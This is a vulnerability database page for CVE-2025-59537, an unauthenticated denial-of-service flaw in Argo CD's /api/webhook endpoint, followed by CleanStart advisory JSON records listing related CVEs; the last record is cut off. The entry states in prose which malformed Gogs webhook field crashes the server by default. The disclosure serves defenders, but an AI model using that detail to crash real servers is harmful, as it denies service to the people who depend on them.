Vulnerability-Lookup

CVE-2025-59537 (GCVE-0-2025-59537)

Vulnerability from cvelistv5 – Published: 2025-10-01 21:01 – Updated: 2025-10-02 15:54

Title

argo-cd is vulnerable to unauthenticated DoS attack via malformed Gogs webhook payload

Summary

Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions 1.2.0 through 1.8.7, 2.0.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.7 and 3.0.18 are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients. With the default configuration, no webhook.gogs.secret set, Argo CD’s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field commits[].repo is not set or is null. This issue is fixed in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-20 - Improper Input Validation
CWE-476 - NULL Pointer Dereference

Assigner

GitHub_M

References

URL

	Vendor	Product	Version
	argoproj	argo-cd	Affected: >= 1.2.0, <= 1.8.7 Affected: >= 2.0.0-rc1, < 2.14.20 Affected: >= 3.2.0-rc1, < 3.2.0-rc2 Affected: >= 3.1.0-rc1, < 3.1.8 Affected: >= 3.0.0-rc1, < 3.0.19

cleanstart-2026-cz81512

Vulnerability from cleanstart

Published

2026-01-30 16:11

Modified

2026-01-29 18:58

Summary

Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes

Details

Multiple security vulnerabilities affect the argo-cd package. Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. See references for individual vulnerability details.

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "CleanStart",
        "name": "argo-cd"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.8.-r0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "credits": [],
  "database_specific": {},
  "details": "Multiple security vulnerabilities affect the argo-cd package. Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. See references for individual vulnerability details.",
  "id": "CLEANSTART-2026-CZ81512",
  "modified": "2026-01-29T18:58:54Z",
  "published": "2026-01-30T16:11:25.451968Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-CZ81512.json"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-55190"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-55191"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-59537"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-59538"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-2v5j-vhc3-9cwm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-2vgg-9h3w-qbr4"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-2xsj-vh29-9cwm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-3wgm-2mw2-vh5m"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-6v2p-p543-phr9"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-92cp-5422-2m47"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-93mq-9ffx-83m2"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-mh63-6h87-95cp"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-mw99-9chc-xw7r"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55190"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55191"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59537"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59538"
    }
  ],
  "related": [],
  "schema_version": "1.7.3",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes",
  "upstream": [
    "CVE-2025-55190",
    "CVE-2025-55191",
    "CVE-2025-59537",
    "CVE-2025-59538",
    "GHSA-2v5j-vhc3-9cwm",
    "GHSA-2vgg-9h3w-qbr4",
    "GHSA-2xsj-vh29-9cwm",
    "GHSA-3wgm-2mw2-vh5m",
    "GHSA-6v2p-p543-phr9",
    "GHSA-92cp-5422-2m47",
    "GHSA-93mq-9ffx-83m2",
    "GHSA-mh63-6h87-95cp",
    "GHSA-mw99-9chc-xw7r"
  ]
}

cleanstart-2026-kz60560

Vulnerability from cleanstart

Published

2026-01-30 16:19

Modified

2026-01-29 18:58

Summary

Due to the design of the name constraint checking algorithm, the processing time of some inputs scale non-linearly with respect to the size of the certificate

Details

Multiple security vulnerabilities affect the argo-cd package. Due to the design of the name constraint checking algorithm, the processing time of some inputs scale non-linearly with respect to the size of the certificate. See references for individual vulnerability details.

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "CleanStart",
        "name": "argo-cd"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.9-r4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "credits": [],
  "database_specific": {},
  "details": "Multiple security vulnerabilities affect the argo-cd package. Due to the design of the name constraint checking algorithm, the processing time of some inputs scale non-linearly with respect to the size of the certificate. See references for individual vulnerability details.",
  "id": "CLEANSTART-2026-KZ60560",
  "modified": "2026-01-29T18:58:54Z",
  "published": "2026-01-30T16:19:55.200542Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-KZ60560.json"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-55190"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-55191"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58183"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58185"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58187"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58188"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58189"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-59537"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-59538"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-61723"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-61724"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-61725"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-2v5j-vhc3-9cwm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-2vgg-9h3w-qbr4"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-2x5j-vhc8-9cwm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-2xsj-vh29-9cwm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-3wgm-2mw2-vh5m"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-4x4m-3c2p-qppc"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-6v2p-p543-phr9"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-92cp-5422-2m47"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-93mq-9ffx-83m2"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-f6x5-jh6r-wrfv"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-hj2p-8wj8-pfq4"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-j5w8-q4qc-rx2x"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-mh63-6h87-95cp"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-mw99-9chc-xw7r"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-r6j8-c6r2-37rr"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55190"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55191"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58185"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58187"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58188"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58189"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59537"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59538"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61723"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61724"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61725"
    }
  ],
  "related": [],
  "schema_version": "1.7.3",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Due to the design of the name constraint checking algorithm, the processing time of some inputs scale non-linearly with respect to the size of the certificate",
  "upstream": [
    "CVE-2025-55190",
    "CVE-2025-55191",
    "CVE-2025-58183",
    "CVE-2025-58185",
    "CVE-2025-58187",
    "CVE-2025-58188",
    "CVE-2025-58189",
    "CVE-2025-59537",
    "CVE-2025-59538",
    "CVE-2025-61723",
    "CVE-2025-61724",
    "CVE-2025-61725",
    "GHSA-2v5j-vhc3-9cwm",
    "GHSA-2vgg-9h3w-qbr4",
    "GHSA-2x5j-vhc8-9cwm",
    "GHSA-2xsj-vh29-9cwm",
    "GHSA-3wgm-2mw2-vh5m",
    "GHSA-4x4m-3c2p-qppc",
    "GHSA-6v2p-p543-phr9",
    "GHSA-92cp-5422-2m47",
    "GHSA-93mq-9ffx-83m2",
    "GHSA-f6x5-jh6r-wrfv",
    "GHSA-hj2p-8wj8-pfq4",
    "GHSA-j5w8-q4qc-rx2x",
    "GHSA-mh63-6h87-95cp",
    "GHSA-mw99-9chc-xw7r",
    "GHSA-r6j8-c6r2-37rr"
  ]
}

cleanstart-2026-jr48309

Vulnerability from cleanstart

Published

2026-01-30 16:11

Modified

2026-01-29 18:58

Summary

Due to the design of the name constraint checking algorithm, the processing time of some inputs scale non-linearly with respect to the size of the certificate

Details

Multiple security vulnerabilities affect the argo-cd-fips package. Due to the design of the name constraint checking algorithm, the processing time of some inputs scale non-linearly with respect to the size of the certificate. See references for individual vulnerability details.

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "CleanStart",
        "name": "argo-cd-fips"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.8.-r0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "credits": [],
  "database_specific": {},
  "details": "Multiple security vulnerabilities affect the argo-cd-fips package. Due to the design of the name constraint checking algorithm, the processing time of some inputs scale non-linearly with respect to the size of the certificate. See references for individual vulnerability details.",
  "id": "CLEANSTART-2026-JR48309",
  "modified": "2026-01-29T18:58:54Z",
  "published": "2026-01-30T16:11:25.334563Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-JR48309.json"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-55190"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-55191"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58183"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58185"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58187"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58188"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58189"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-59537"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-59538"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-61723"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-61724"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-61725"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-2v5j-vhc3-9cwm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-2vgg-9h3w-qbr4"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-2xsj-vh29-9cwm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-3wgm-2mw2-vh5m"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-6v2p-p543-phr9"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-92cp-5422-2m47"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-93mq-9ffx-83m2"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-m6hq-p25p-ffr2"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-mh63-6h87-95cp"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-mw99-9chc-xw7r"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55190"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55191"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58185"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58187"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58188"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58189"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59537"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59538"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61723"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61724"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61725"
    }
  ],
  "related": [],
  "schema_version": "1.7.3",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Due to the design of the name constraint checking algorithm, the processing time of some inputs scale non-linearly with respect to the size of the certificate",
  "upstream": [
    "CVE-2025-55190",
    "CVE-2025-55191",
    "CVE-2025-58183",
    "CVE-2025-58185",
    "CVE-2025-58187",
    "CVE-2025-58188",
    "CVE-2025-58189",
    "CVE-2025-59537",
    "CVE-2025-59538",
    "CVE-2025-61723",
    "CVE-2025-61724",
    "CVE-2025-61725",
    "GHSA-2v5j-vhc3-9cwm",
    "GHSA-2vgg-9h3w-qbr4",
    "GHSA-2xsj-vh29-9cwm",
    "GHSA-3wgm-2mw2-vh5m",
    "GHSA-6v2p-p543-phr9",
    "GHSA-92cp-5422-2m47",
    "GHSA-93mq-9ffx-83m2",
    "GHSA-m6hq-p25p-ffr2",
    "GHSA-mh63-6h87-95cp",
    "GHSA-mw99-9chc-xw7r"
  ]
}

cleanstart-2026-xr85161

Vulnerability from cleanstart

Published

2026-01-30 16:02

Modified

2026-01-29 18:58

Summary

Due to the design of the name constraint checking algorithm, the processing time of some inputs scale non-linearly with respect to the size of the certificate

Details

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "CleanStart",
        "name": "argo-cd-fips"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.9-r4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "credits": [],
  "database_specific": {},
  "details": "Multiple security vulnerabilities affect the argo-cd-fips package. Due to the design of the name constraint checking algorithm, the processing time of some inputs scale non-linearly with respect to the size of the certificate. See references for individual vulnerability details.",
  "id": "CLEANSTART-2026-XR85161",
  "modified": "2026-01-29T18:58:54Z",
  "published": "2026-01-30T16:02:54.934169Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-XR85161.json"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-55190"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-55191"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58183"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58185"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58187"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58188"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58189"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-59537"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-59538"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-61723"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-61724"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-61725"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-2v5j-vhc3-9cwm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-2vgg-9h3w-qbr4"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-2x5j-vhc8-9cwm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-2xsj-vh29-9cwm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-3wgm-2mw2-vh5m"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-4x4m-3c2p-qppc"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-6v2p-p543-phr9"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-92cp-5422-2m47"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-93mq-9ffx-83m2"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-f6x5-jh6r-wrfv"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-hj2p-8wj8-pfq4"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-j5w8-q4qc-rx2x"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-mh63-6h87-95cp"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-mw99-9chc-xw7r"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-r6j8-c6r2-37rr"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55190"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55191"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58185"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58187"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58188"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58189"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59537"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59538"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61723"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61724"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61725"
    }
  ],
  "related": [],
  "schema_version": "1.7.3",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Due to the design of the name constraint checking algorithm, the processing time of some inputs scale non-linearly with respect to the size of the certificate",
  "upstream": [
    "CVE-2025-55190",
    "CVE-2025-55191",
    "CVE-2025-58183",
    "CVE-2025-58185",
    "CVE-2025-58187",
    "CVE-2025-58188",
    "CVE-2025-58189",
    "CVE-2025-59537",
    "CVE-2025-59538",
    "CVE-2025-61723",
    "CVE-2025-61724",
    "CVE-2025-61725",
    "GHSA-2v5j-vhc3-9cwm",
    "GHSA-2vgg-9h3w-qbr4",
    "GHSA-2x5j-vhc8-9cwm",
    "GHSA-2xsj-vh29-9cwm",
    "GHSA-3wgm-2mw2-vh5m",
    "GHSA-4x4m-3c2p-qppc",
    "GHSA-6v2p-p543-phr9",
    "GHSA-92cp-5422-2m47",
    "GHSA-93mq-9ffx-83m2",
    "GHSA-f6x5-jh6r-wrfv",
    "GHSA-hj2p-8wj8-pfq4",
    "GHSA-j5w8-q4qc-rx2x",
    "GHSA-mh63-6h87-95cp",
    "GHSA-mw99-9chc-xw7r",
    "GHSA-r6j8-c6r2-37rr"
  ]
}

cleanstart-2026-wq07901

Vulnerability from cleanstart

Published

2026-01-30 16:01

Modified

2026-01-29 18:58

Summary

SSH clients receiving SSH_AGENT_SUCCESS when expecting a typed response will panic and cause early termination of the client process

Details

Multiple security vulnerabilities affect the argo-cd-fips package. SSH clients receiving SSH_AGENT_SUCCESS when expecting a typed response will panic and cause early termination of the client process. See references for individual vulnerability details.

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "CleanStart",
        "name": "argo-cd-fips"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.2.1-r0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "credits": [],
  "database_specific": {},
  "details": "Multiple security vulnerabilities affect the argo-cd-fips package. SSH clients receiving SSH_AGENT_SUCCESS when expecting a typed response will panic and cause early termination of the client process. See references for individual vulnerability details.",
  "id": "CLEANSTART-2026-WQ07901",
  "modified": "2026-01-29T18:58:54Z",
  "published": "2026-01-30T16:01:54.911193Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-WQ07901.json"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-47913"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-47914"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-55190"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-55191"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58181"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58183"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58185"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58187"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58188"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58189"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-59537"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-59538"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-61723"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-61724"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-61725"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-2v5j-vhc3-9cwm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-2vgg-9h3w-qbr4"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-2xsj-vh29-9cwm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-3wgm-2mw2-vh5m"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-4x4m-3c2p-qppc"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-6v2p-p543-phr9"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-92cp-5422-2m47"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-93mq-9ffx-83m2"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-f6x5-jh6r-wrfv"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-hj2p-8wj8-pfq4"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-j5w8-q4qc-rx2x"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-mh63-6h87-95cp"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/GHSA-mw99-9chc-xw7r"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47913"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47914"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55190"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55191"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58181"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58185"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58187"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58188"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58189"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59537"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59538"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61723"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61724"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61725"
    }
  ],
  "related": [],
  "schema_version": "1.7.3",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SSH clients receiving SSH_AGENT_SUCCESS when expecting a typed response will panic and cause early termination of the client process",
  "upstream": [
    "CVE-2025-47913",
    "CVE-2025-47914",
    "CVE-2025-55190",
    "CVE-2025-55191",
    "CVE-2025-58181",
    "CVE-2025-58183",
    "CVE-2025-58185",
    "CVE-2025-58187",
    "CVE-2025-58188",
    "CVE-2025-58189",
    "CVE-2025-59537",
    "CVE-2025-59538",
    "CVE-2025-61723",
    "CVE-2025-61724",
    "CVE-2025-61725",
    "GHSA-2v5j-vhc3-9cwm",
    "GHSA-2vgg-9h3w-qbr4",
    "GHSA-2xsj-vh29-9cwm",
